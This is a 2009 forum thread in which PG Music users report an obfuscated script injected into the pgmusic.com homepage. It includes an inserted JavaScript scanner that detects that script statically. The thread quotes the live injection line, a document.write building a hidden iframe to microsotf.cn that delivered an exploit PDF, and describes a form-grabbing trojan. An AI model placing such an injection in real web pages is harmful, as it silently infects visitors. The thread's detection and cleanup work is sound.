Posted By: Grayson Virus loader on pgmusic.com homepage? - 07/05/09 10:07 PM
If you look at the source for the pgmusic.com home page, do you see the following line?:

<body ><script>document.write("<if"+''+'ra'+''+"m"+'e s'+"rc=\"h"+''+'tt'+"p:"+''+"/"+''+'/mic'+"roso"+'t'+''+'f.c'+"n"+'/'+"\" wid"+''+'th=1 he'+"igh"+''+'t'+"="+"2></i"+''+"f"+"ra"+''+""+''+"me"+'>');</script>

Seems to be an obfuscated link to "microsotf.cn" which gave me a virus warning.

Just curious if this is something happening on my end or if it's actually in the page itself.

Thanks.
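The injected line quoted above builds the iframe tag out of dozens of tiny string fragments, so a plain text search of the page for `<iframe` or `microsotf.cn` finds nothing. The following is an added example, not code from this post or from PG Music: it rebuilds the string that document.write() would have emitted by accepting only string literals joined by `+` (no JavaScript from the page is ever executed), then reports the frame's destination host and whether its 1x2 pixel size marks it as hidden. The second, benign sample is constructed to show the check stays quiet on ordinary concatenation.

```javascript
// Added example (not code from the forum thread or from PG Music): statically
// reconstruct the string handed to document.write() in the injected line quoted
// above and flag a hidden iframe, without executing any JavaScript from the page.
// Only string literals joined by '+' are accepted, so nothing from the page can run.

// Constructed sample input: the injected line exactly as quoted in the thread.
const INJECTED_LINE = String.raw`<body ><script>document.write("<if"+''+'ra'+''+"m"+'e s'+"rc=\"h"+''+'tt'+"p:"+''+"/"+''+'/mic'+"roso"+'t'+''+'f.c'+"n"+'/'+"\" wid"+''+'th=1 he'+"igh"+''+'t'+"="+"2></i"+''+"f"+"ra"+''+""+''+"me"+'>');</script>`;

// Constructed benign sample: ordinary concatenation, not an iframe.
const BENIGN_LINE = '<script>document.write("<p>Hello " + "world</p>");</script>';

// Parse one JS string literal starting at src[i] (the opening quote).
function parseStringLiteral(src, i) {
  const quote = src[i];
  const escapes = { n: '\n', t: '\t', r: '\r', '0': '\0' };
  let value = '';
  let j = i + 1;
  while (j < src.length && src[j] !== quote) {
    if (src[j] === '\\' && j + 1 < src.length) {
      const e = src[j + 1];
      // \" -> ", \\ -> \, \' -> ', plus the common control escapes
      value += Object.prototype.hasOwnProperty.call(escapes, e) ? escapes[e] : e;
      j += 2;
    } else {
      value += src[j++];
    }
  }
  if (j >= src.length) throw new Error('unterminated string literal');
  return { value, next: j + 1 };
}

// Evaluate an expression consisting solely of string literals joined by '+'.
// Returns the concatenated value and how many literals it was split into.
function evaluateConcat(expr) {
  let value = '';
  let fragments = 0;
  let wantLiteral = true;
  for (let i = 0; i < expr.length; ) {
    const c = expr[i];
    if (/\s/.test(c)) { i++; continue; }
    if (wantLiteral) {
      if (c !== '"' && c !== "'") throw new Error(`not a pure string expression at offset ${i}`);
      const lit = parseStringLiteral(expr, i);
      value += lit.value;
      fragments++;
      i = lit.next;
    } else {
      if (c !== '+') throw new Error(`expected '+' at offset ${i}`);
      i++;
    }
    wantLiteral = !wantLiteral;
  }
  if (wantLiteral) throw new Error('empty expression or trailing +');
  return { value, fragments };
}

// Find every document.write(...) call and return its raw argument text,
// skipping over parentheses that sit inside string literals.
function extractDocumentWriteArgs(html) {
  const marker = 'document.write(';
  const args = [];
  for (let start = html.indexOf(marker); start !== -1; start = html.indexOf(marker, start + 1)) {
    let i = start + marker.length;
    let depth = 0;
    const argStart = i;
    while (i < html.length) {
      const c = html[i];
      if (c === '"' || c === "'") { i = parseStringLiteral(html, i).next; continue; }
      if (c === '(') depth++;
      else if (c === ')') { if (depth === 0) break; depth--; }
      i++;
    }
    args.push(html.slice(argStart, i));
  }
  return args;
}

// Describe one reconstructed write: is it an iframe, where does it point, is it hidden?
function describeWrite(arg) {
  const { value, fragments } = evaluateConcat(arg);
  const finding = { rendered: value, fragments, iframe: false, src: null, host: null, hidden: false };
  const tag = value.match(/<iframe\b([^>]*)>/i);
  if (tag) {
    finding.iframe = true;
    const attrs = tag[1];
    const src = attrs.match(/\bsrc\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/i);
    finding.src = src ? (src[1] ?? src[2] ?? src[3]) : null;
    try { finding.host = finding.src ? new URL(finding.src).hostname : null; } catch { finding.host = null; }
    const w = attrs.match(/\bwidth\s*=\s*["']?(\d+)/i);
    const h = attrs.match(/\bheight\s*=\s*["']?(\d+)/i);
    // A frame only a few pixels big (or display:none) is not meant to be seen.
    finding.hidden = Boolean(w && h && Number(w[1]) <= 10 && Number(h[1]) <= 10) || /display\s*:\s*none/i.test(attrs);
  }
  // Many tiny literals producing a short result is the obfuscation signature seen above.
  finding.obfuscated = fragments >= 8 && fragments / Math.max(value.length, 1) > 0.2;
  finding.suspicious = (finding.iframe && finding.hidden) || finding.obfuscated;
  return finding;
}

// Scan a whole page: one finding per document.write() whose argument is pure string literals.
function scanPage(html) {
  return extractDocumentWriteArgs(html).map(describeWrite);
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(scanPage(INJECTED_LINE));
  console.log(scanPage(BENIGN_LINE));
}
```

Run with `node` on a saved copy of the page source; for the quoted line it reports `host: 'microsotf.cn'`, `hidden: true`. Real injections often use other tricks (`unescape`, `String.fromCharCode`, `eval`), which this parser deliberately refuses rather than executes, so a refusal on a `document.write` call is itself worth a manual look.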
Posted By: D. Tuna Re: Virus loader on pgmusic.com homepage? - 07/05/09 10:44 PM
yes i see it in the source.

are you the Grayson who works at PG?
Posted By: Ryszard Re: Virus loader on pgmusic.com homepage? - 07/06/09 12:13 AM
When I read this from my Internet machine, I looked at the status of Avast!, my AV program. It was OFF. I don't even know how to do that. I am doing a Thorough Scan as I write. If there's something going on I'll have to reinstall an AV program on my DAW as I tend to stay logged into PG.

I have received several emails in the last few weeks under friends' names, but which were clearly the result of worms. All the messages have contained links to Chinese websites, most purporting to sell computers. I have gotten reports of illicit Chinese activity from other sources as well. To my mind, Chinese black-hat crackers (what folks erroneously call "hackers", who are really the white hats) are ve-ry busy these days. Make sure your AV programs are on and up to date.

R.
"Seems to be an obfuscated link to "microsotf.cn" which gave me a virus warning."

I'm getting the same thing when I try to go to the PGMusic home page through my SBC Yahoo browser. When I use just the MS Explorer browser, it doesn't happen. BTW, I am using Avast and Spybot.
Posted By: rharv Re: Virus loader on pgmusic.com homepage? - 07/06/09 03:33 AM
Yeah, Avast jumped right in as soon as I looked at the homepage - needs attention!
I hate those javascript redirectors - they can be anywhere in the code; sometimes in places that are not even supposed to get read (like between the head and body tags), which explains why some browsers are more susceptible than others... but regardless of browser the problem is there.
Posted By: toucher Re: Virus loader on pgmusic.com homepage? - 07/06/09 04:13 AM
Avast caught mine right away when I went to the page this morning. Since then it has not come up again.
Posted By: Curmudgeon Re: Virus loader on pgmusic.com homepage? - 07/06/09 05:34 AM
It didn't make a lot of sense on my part, but I checked the homepage out. Avast worked for me also with a malware warning.

Don S.
Posted By: Grayson Re: Virus loader on pgmusic.com homepage? - 07/06/09 06:43 AM
Thanks. I did send them email about it. Hopefully it'll get addressed ASAP.

BTW I don't work for PG Music, Mr Tuna.
Hi
I'm also getting a trojan virus warning from Kaspersky when opening up PGMusic homepage what does this mean and is it being looked at.
The warning from Kaspersky is Trojan-Downloader.JS.Iframe.bjn

Brian Cadoret
Posted By: rharv Re: Virus loader on pgmusic.com homepage? - 07/06/09 03:36 PM
I have heard that ridding a site of these types of infections is a tough task and time consuming so I assume they'll need a little time to resolve it.

I know of business sites that took a few weeks getting rid of it, only to get it again.
Keep your AV updated.
Use SpybotS&D too, as these redirectors hide from the Windows API and do not show up in antivirus scans or the running processes list. They can be tough to get rid of.

Here's a description of one such javascript redirector -

After execution of e.g. 9129837.exe PWS.Small.bs installs a service (hide_evr2) and copies itself and the service file to the Windows directory. Additionally an autorun entry (ttool) is created which loads the 9129837.exe on every windows startup. The service affects that the two files and the autorun entry are hidden from the windows API, i.e. the user cannot see the files. If you visit webpages with forms like ebay or online banking pages the filled-in information like userid and password/pin are sent to http://81.95.147.107/cgi-bin/**** ADDITIONAL REMOVAL INSTRUCTION: Please reboot your PC in Safe Mode and perform another scan of Spybot - Search & Destroy to remove the remainings.

Having unfamiliar processes running like the above mentioned "9129837.exe" is not a good sign..
Posted By: Ryszard Re: Virus loader on pgmusic.com homepage? - 07/06/09 03:47 PM
My Avast! scan didn't show anything, but there was an info page somewhere that did list the 'microsotf.cn' thingie as an infection. More importantly, though, when I checked Avast! it was OFF again--not just that the scanners were disabled, but the program was not resident in memory. This is very concerning. I've started it again and will be keeping a close eye on it.

Edit: Followup: I can run a scan with Avast! but it does not run on Windows startup and will not stay in memory. I'm downloading AVG as I write.

So, we think this thing is a keystroke logger?

R.
Posted By: Curmudgeon Re: Virus loader on pgmusic.com homepage? - 07/06/09 03:52 PM
Richard,

I had the same problem with Avast a while back. I deleted and then reinstalled it. So far, so good.

Don S.
Posted By: rharv Re: Virus loader on pgmusic.com homepage? - 07/06/09 03:57 PM
It is likely a keylogger - please go back and read my previous post - an antivirus will NOT find it
use SPYBOT quickly

I would disconnect from internet, (you may have to be on internet to install Spybot Search and Destroy) then scan, then scan again in safe mode as per Spybot instructions.

It is *probably* taking keylogging info and sending to a site somewhere... that is the purpose of these types of trojans

I am NOT trying to cause widespread panic, but it is a serious threat when one of these gets in, I have first and second hand experience removing this for others. Tend to your machine, especially if you have banking accounts or access to other web sites thru FTP on that machine.
If you watch when it first gets in you can see it connecting to .cn sites to update itself and start running...
I tested a couple infected sites and closely watched the results.
It gets into a web site through FTP by an infected admin, so all access should be closed and known clean backups used. Hopefully these exist on a source separate from the main site.

A clean machine should also be used to reset all passwords for any admins to get access. Otherwise passwords are still held at the remote site for later reinfection.
It's an ugly ugly situation once it gets in.
I can list other sites infected right now, and have actually reported them to Google but they have not responded by associating a warning with these sites yet.
Posted By: rharv Re: Virus loader on pgmusic.com homepage? - 07/06/09 04:11 PM
As a side note - some versions are capable of adapting to the php used in forums, hopefully pgmusic is on top of this and the site is hosted separately.

If PGMusic wants to check, look at the php script in the index.php files for added cryptic php code.
It will not be easy to see using the 'view source' but will be easy to see using the source codes on the server.
Also trojans seem to like the 'include' folders and javascript folders.
This, however is much more rare than the current version that is infecting sites.

I suggest keeping a copy of install files for Spybot and Antivirus on a drive somewhere. I have seen these types of trojans block access to Avast, McAfee and Symantec, and probably others..

just trying to help with what I have seen.
Posted By: JBlatz Re: Virus loader on pgmusic.com homepage? - 07/06/09 04:41 PM
I'm running Linux and just safely saved the 25.8 KB malware download to disk. Its name is 955.pdf, so perhaps it is using an Acrobat exploit. I found another site that thinks their site was infected with it on 7/4.
(http://olegvolk.livejournal.com/628779.html)

If anyone needs the internal contents of the file, let me know. I will keep it a few days before deleting the file. For those using AVG antivirus protection, I ran an AVG scan on the file and AVG passed it as being OK, so be careful.

By the way, I urge all of you to only use Linux for surfing the internet.
Posted By: rharv Re: Virus loader on pgmusic.com homepage? - 07/06/09 06:02 PM
Linux is fine until you run into a virus designed to exploit Linux.
There are just about as many security updates for Linux as there are for Windows these days.. depending on the brand of Linux you want to run.

I use Linux Live CD's to get into infected systems and repair sometimes, so I know it has benefits for trojans designed to exploit Windows, but it is by no means completely safe.

I would be interested in viewing the file contents, but I'd need to access it on a safer machine. Besides, a lot of mail servers will indeed catch it and stop delivery, as a lot of them are running linux also!
Congrats on outsmarting this one, and thanks for the extra efforts.
Other sites with the infection include dademoldinspectors and enviropro.net... among hundreds of others.
If you are interested in helping for these types of things, check out badwarebusters.org
Posted By: Mac Re: Virus loader on pgmusic.com homepage? - 07/06/09 06:22 PM
Has the pgmusic homepage been fixed?
I used the Live Help to ask. This is the reply I got:

"Jareth: Welcome to PG Music's live help. May we please have your first and last name to better assist you?
you: HI, this is Gary Curran. Do you know if anyone has found and removed the virus loader program from the main web page yet?
you: There is a thread in the Off Topic forum about it, several of us running Avast A/V have had Malware warnings about it.
Jareth: I'm currently asking our webmaster
Jareth: give me one moment
you: thank you, Jareth.
Jareth: webmaster says there is a script and that it is likely not dangerous - the contents are currently being analyzed and we will inform everyone as soon as we have reached a conclusion
you: okay. Thanks a lot.
you: have a great day.
Jareth: you're welcome, bye
you: END CHAT
Jareth: you too

Gary
Posted By: rharv Re: Virus loader on pgmusic.com homepage? - 07/06/09 07:45 PM
JBlatz - what makes you think that the malware is called 955.pdf?
That appears to be a valid program/ format.
http://www.pdf995.com/

What I saw was a downloader script - a couple different warnings actually.. when I went to the home page.
Hi
Just visited the PGMusic homepage and Kaspersky is NOT giving me trojan warnings anymore , I hope this is a good sign.

Brian Cadoret
This is what it is/was

7/6/2009 11:24:42 AM SYSTEM 312 Sign of "JS:Pdfka-JV [Expl]" has been found in "http://microsotf.cn/img/pfqd.php" file.

It is an infected PDF file. I use Firefox with Nitro PDF tool. The minute Avast flagged this Nitro opened and asked what to do with this file.
Yes, it looks like a line of code got injected to our web page from somewhere external on the Internet (via a vulnerability in the system that has since been fixed), that was wanting to download a PDF file. (reportedly PDF files can be malicious if you have an older version of your PDF reader)

Apparently these things hunt the internet looking for specific vulnerabilities.

This has been removed from the web page, and things should be back to normal now.

From a google search, if the PDF was downloaded, and managed to infect, it most likely would be delivering unwanted popup ads and possibly other things. You should do an adware/virus scan to make sure things are OK.

There are many good spyware/virus programs, including free scanners (e.g. http://www.kaspersky.com/virusscanner)
I apologize for this inconvenience.
Posted By: rharv Re: Virus loader on pgmusic.com homepage? - 07/06/09 09:02 PM
Thanks Peter, it's good to hear it's handled
Peter,
It bothers me that you have to apologize for the inconvenience, since you are doing nothing more than running your business. The people who write these things should be found, prosecuted, and then punished for the harm they cause.

While this may have not been anything other than an infected .pdf file, it may have caused loss of business, loss of time for customers, loss of revenue for customers, loss of time for your employees and such.

In a sense, these individuals are no better than the terrorists and pirates populating our world today. And, at some point, they are going to become just as deadly.

Thanks for getting it cleared up, Peter.

Gary
Posted By: Don Gaynor Re: Virus loader on pgmusic.com homepage? - 07/07/09 12:09 AM
Quote:

In a sense, these individuals are no better than the terrorists and pirates populating our world today. And, at some point, they are going to become just as deadly.

the millions or possibly billions of dollars in lost man-hours alone probably far exceeds all other forms of 'piracy' already. too bad someone couldn't come up with a plan to root these people out then prosecute them to the fullest extent of the law. microsoft puts a bounty on their heads but i don't know how effective that has been. maybe a portion of software sales should go into a fund dedicated to exposing these 'terrorists.' the money and effort we all spend on av software would be a good start toward the fund.

just 2 cents from a victim of a trojan that put me out of business with band in a box.
Posted By: JBlatz Re: Virus loader on pgmusic.com homepage? - 07/07/09 01:53 AM
Bob,

The file that popped up when I viewed the PG home page was actually named 955.pdf. Instead of viewing it, I downloaded the file. When I opened it in the Open Office reader, it was blank. However, viewing the file in a hex editor listed more details. Probably like Peter said, it is a specially crafted pdf designed to take advantage of a Windows vulnerability.
According to Adobe:

Platform: Windows XP or Windows 2003 (Vista users are not affected) with Internet Explorer 7 installed

Affected software versions: Adobe Reader 8.1 and earlier, Adobe Reader 7.0.9 and earlier
Adobe Acrobat Professional, 3D and Standard 8.1 and earlier versions, Adobe Acrobat Professional, Standard, 3D and Elements 7.0.9 and earlier

Anyone with the above is in danger of the pdf file using the mailto capacity in Adobe to forward information to a 3rd party. I recall using this feature when designing test papers for the fire department; on completion of the test the answers and the user's name, date, and badge number were emailed to the Training Office. I'm a little muddy as to how this works in the instance of the webpage, unless it's loading itself as a TSR type piece of software and sending information from forms to another site.

I will not use IE7, and only use that browser if forced to by Microsoft.
Posted By: rharv Re: Virus loader on pgmusic.com homepage? - 07/07/09 12:15 PM
Strange, I thought I intentionally used the Firefox browser when I went there..

Using the form feature and mailto feature make sense to me. Anytime you fill out a form, it gets mailed to some guy in China; (think username, password type forms boxes)
Some would call that a keylogger, I certainly would, it is a selective keylogger that only mails out keystrokes entered in forms (probably secure forms). Sounds just about like Spybot described it. They claim it is logging any form information and sending it to a remote system. Now if they know the system it is getting sent to... seems like it would be an easy shot for the right 'forensic inspector'.
Yeah, I know, they can hijack innocent computers and use those as stoops.. but it would be a start.
I have links right to the forum, don't go to the homepage. So do you assume that if you go to order something on-line from PG's store that the info ended up going out to Tim-buck-two?
Posted By: rharv Re: Virus loader on pgmusic.com homepage? - 07/07/09 04:10 PM
I don't assume anything
I believe PGMusic would have by design any orders going through a separate secure server.
A secure server will be much harder to infiltrate than a basic webpage server.. although accidental infection is surely possible from admin access.
Since the forum seemed to stay safe during the issue, I believe they have the different components on separate servers or server partitions. I don't know of any trojan that can jump partitions or domains on a server. Otherwise I would be battling about 15 infected sites right now. One of the infected sites I listed above is still infected after two months (recurring issue) and is on a server that also contains a website I administer. This is how I knew about it to begin with; the guy called us to make sure we knew about his issue and to make sure it hadn't affected our sites, since all sites he administered on that server were getting infected.
I told him it was a sign that he was the one with crap on his shoes and every time he went in to check his sites he was smearing a little around.
We know exactly what to look for and have seen no sign on our sites.
Posted By: Mac Re: Virus loader on pgmusic.com homepage? - 07/07/09 04:13 PM
What rharv said.

Stay cool, no panic, no rumors please.

--Mac
© PG Music Forums